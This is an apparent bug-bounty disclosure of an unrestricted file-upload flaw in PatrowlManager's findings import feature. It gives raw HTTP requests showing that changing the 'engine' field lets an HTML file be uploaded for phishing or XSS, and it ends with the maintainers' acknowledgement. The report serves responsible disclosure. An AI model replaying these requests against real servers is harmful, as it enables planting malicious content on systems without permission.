Unrestricted Upload of File with Dangerous Type in patrowl/patrowlmanager
Valid
Reported on
Dec 11th 2021
Description
Hi there, I would like to report a vulnerability in the way PatrowlManager handle upload files. This is in Finding -> Import feature
Proof of Concept
- Install PatrowlManager on you local system
- Go to Finding -> Import and import a file
- An import request look like this
POST /findings/import HTTP/1.1
Host: localhost:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------29659837897421318982168117420
Content-Length: 886
Origin: http://localhost:8083
Connection: close
Referer: http://localhost:8083/findings/import
Cookie: patrowl-manager-sc=d7q0a2r8b3b3ytmslj252gxt2l3epdmn
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="csrfmiddlewaretoken"
nMMKSdScbbCYF7NK7YyzuaW9diH5PhI24HBlLGDuAGf1VI5RhmDQdnrpiGyaZaG2
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="engine"
html
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="min_level"
info
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="file"; filename="file.json"
Content-Type: text/html
file-content
-----------------------------29659837897421318982168117420--
If you change "engine" in the above request to some other extensions like .html, .py, you can upload any type of file you want. One example of uploading html file for fishing and XSS is
POST /findings/import HTTP/1.1
Host: localhost:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------29659837897421318982168117420
Content-Length: 875
Origin: http://localhost:8083
Connection: close
Referer: http://localhost:8083/findings/import
Cookie: patrowl-manager-sc=d7q0a2r8b3b3ytmslj252gxt2l3epdmn
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="csrfmiddlewaretoken"
nMMKSdScbbCYF7NK7YyzuaW9diH5PhI24HBlLGDuAGf1VI5RhmDQdnrpiGyaZaG2
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="engine"
html
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="min_level"
info
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="file"; filename="patrowl.html"
Content-Type: text/html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Here</title>
</head>
<body>
<a href="https://example.com">Click here</a>
</body>
</html>
-----------------------------29659837897421318982168117420--
- Go to folder /media/imports/<owner_id>/ and see that the dangerous html file is uploaded.
Impact
This vulnerability is capable of uploading dangerous type of file to server.
We are processing your report and will contact the
patrowl/patrowlmanager
team within 24 hours.
a year ago
We have contacted a member of the
patrowl/patrowlmanager
team and are waiting to hear back
a year ago
Hi @M0rphling, thanks for your report ! Will fix it ASAP
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation